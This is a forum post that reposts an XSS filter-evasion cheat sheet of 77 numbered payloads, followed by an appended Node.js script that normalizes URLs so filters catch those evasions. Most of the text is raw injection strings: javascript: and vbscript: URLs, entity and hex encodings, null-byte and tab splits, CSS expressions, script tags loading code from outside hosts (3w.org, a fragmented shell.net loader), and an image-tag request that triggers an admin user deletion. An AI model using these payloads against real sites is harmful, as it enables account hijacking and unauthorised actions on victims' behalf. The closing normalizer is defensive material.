Seems t00ls has rather little material on XSS; I saw this good stuff and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a javascript: URL
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (the semicolons are required here): every character of javascript:alert("XSS") written as a decimal character reference
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (see the XSS Calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode (decimal character reference) encoding (see the XSS Calculator)
<IMG SRC=jav..elided..S')>
(9) Long (7-digit) UTF-8 Unicode encoding, no semicolons needed (see the XSS Calculator)
<IMG SRC=jav..elided..S')>
(10) Hex encoding, also without semicolons (see the XSS Calculator)
<IMG SRC=java..elided..XSS')>
(11) Embedded tab splitting the JavaScript (a literal tab character between jav and ascript; it became a space when the page was copied)
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multi-line injected JavaScript, an extreme case: every character of the tag sits on its own line (the line breaks were collapsed when the page was copied)
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a length limit (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null characters are basically useless domestically by now, since there is nowhere left to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the javascript: in an IMG tag (the control character that follows the opening quote was dropped when the page was copied)
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2, with a protocol-relative src
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escape
\";alert('XSS');//
(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag (an event handler, so no javascript: or <SCRIPT needed)
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with an extra character in front of javascript: (1-32&34&39&160&8192-8&13&12288&65279 all work; the character itself was dropped when the page was copied)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with an expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with a comment-broken expression (only the tail of the payload survives on the page)
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Inside the Flash file, ActionScript can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace (the .HTC file must be on the same server as your XSS vector)
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JavaScript is filtered, serve it from an image file: the script src points at an image whose body is JavaScript (the URL was lost when the page was copied)
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command: the victim's browser fetches the URL with the victim's cookies, so it can trigger an authenticated action on that site
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2 (a.jpg on the same server, redirected by the web server to the action)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters with quote encapsulation
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL string evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(70) Dword (decimal) IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding (a newline and tab characters embedded inside the URL, shown here as spaces; the host mixes decimal, octal and hex octets)
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping the http:
<A HREF="//www.google.com/">XSS</A>
(75) Dropping the www
<A HREF="http://google.com/">XSS</A>
(76) Trailing dot for absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
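An added example, not part of the original post or of the cheat sheet it copies: the reason entries (3) to (19), (47) and (68) to (76) get past keyword filters is that the filter inspects the raw attribute string while the browser acts on a normalized one. The Node.js script below (no dependencies, names of my own choosing) does that normalization itself: it decodes numeric character references with or without semicolons, strips the control characters the URL parser drops, and canonicalizes numeric IPv4 hosts written in decimal, hex, octal or a mixture, so that a scheme or host check sees what the browser will see. The sample payloads at the bottom are constructed from the entries above.

```javascript
'use strict';
// Added example, not code from the original post: normalize an attribute URL the way a
// browser does before checking it, so the evasions in entries (3)-(19), (47) and
// (68)-(76) are inspected in their resolved form. Function names are this example's own.

// Printable character for a code point, or U+FFFD if the reference is out of range.
const fromCodePoint = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '\ufffd');

// Decode numeric character references. In an HTML attribute the trailing semicolon is
// optional, which is what the no-semicolon variants in entries (9) and (10) rely on.
function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCodePoint(parseInt(d, 10)));
}

// Drop ASCII control characters anywhere (tab, LF, CR, NUL, ...) and trim the ends.
// The current URL standard strips only tab/LF/CR mid-string, but legacy engines dropped
// any control character, so a checker should assume the looser behaviour.
function stripControls(s) {
  return s.replace(/[\u0000-\u001f\u007f]/g, '').trim();
}

// Lower-cased scheme of a URL, or null when the URL is relative.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Canonical form of a raw attribute value and the scheme the browser would act on.
function classifyUrl(raw) {
  const canonical = stripControls(decodeCharRefs(raw));
  return { canonical, scheme: schemeOf(canonical) };
}

// Allow-list check: only known inert schemes or relative URLs pass. A block-list of
// "javascript" alone would still miss vbscript: (entry 40) and data: URLs.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);
function isSafeLink(raw) {
  const { scheme } = classifyUrl(raw);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// One dotted component as inet_aton reads it: 0x.. is hex, a leading 0 is octal,
// anything else is decimal.
function parseIpPart(p) {
  if (/^0x[0-9a-f]+$/i.test(p)) return parseInt(p.slice(2), 16);
  if (/^0[0-7]+$/.test(p)) return parseInt(p, 8);
  if (/^\d+$/.test(p)) return parseInt(p, 10);
  return NaN;
}

// Dotted-quad form of a numeric IPv4 host written with 1 to 4 components (the last
// component fills the remaining bytes, so "3232235521" is a valid one-part address);
// non-numeric hosts are lower-cased and lose the absolute-DNS trailing dot (entry 76).
function canonicalHost(host) {
  const h = host.toLowerCase().replace(/\.$/, '');
  const parts = h.split('.');
  if (parts.length > 4) return h;
  const nums = parts.map(parseIpPart);
  if (nums.some(Number.isNaN)) return h; // a name, not a numeric address
  const lead = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  const lastBytes = 4 - lead.length;
  if (lead.some((n) => n > 255) || last >= 2 ** (8 * lastBytes)) return h; // not valid
  let value = last;
  lead.forEach((n, i) => { value += n * 2 ** (8 * (lastBytes + lead.length - 1 - i)); });
  return [24, 16, 8, 0].map((sh) => Math.floor(value / 2 ** sh) % 256).join('.');
}

// Host of an absolute or protocol-relative http(s) URL, percent-decoded (entry 69) and
// canonicalized; null for anything else (including javascript: URLs).
function hostOf(url) {
  const m = /^(?:https?:)?\/\/([^/?#]*)/i.exec(stripControls(url));
  if (!m) return null;
  let host = m[1];
  try { host = decodeURIComponent(host); } catch (e) { /* keep undecodable input */ }
  return canonicalHost(host);
}

// Constructed payloads taken from the entries above; run with `node` to see each one's
// canonical form, scheme, allow-list verdict and host.
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "jav&#x09;ascript:alert('XSS');",
  'java\u0000script:alert("XSS")',
  'http://3232235521',
  'http://0300.0250.0000.0001',
  'h\ntt\tp://6\t6.000146.0x7.147/',
];
for (const s of SAMPLES) {
  const { canonical, scheme } = classifyUrl(s);
  console.log(JSON.stringify(s), '->', canonical, '| scheme:', scheme,
    '| safe:', isSafeLink(s), '| host:', hostOf(s));
}
```

The WHATWG URL parser that current browsers and Node's URL class implement applies the same IPv4 rules, so new URL('http://0xc0.0xa8.0x00.0x01/').hostname already yields 192.168.0.1; the mistake these evasions exploit is comparing the raw attribute text instead of the parsed protocol and hostname. Character references are the HTML parser's business and are decoded before the URL parser ever sees the value, which is why a check on source text must decode them too, or better, run against the DOM after parsing.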
Original source: http://fuzzexp.org/u/0day/?p=144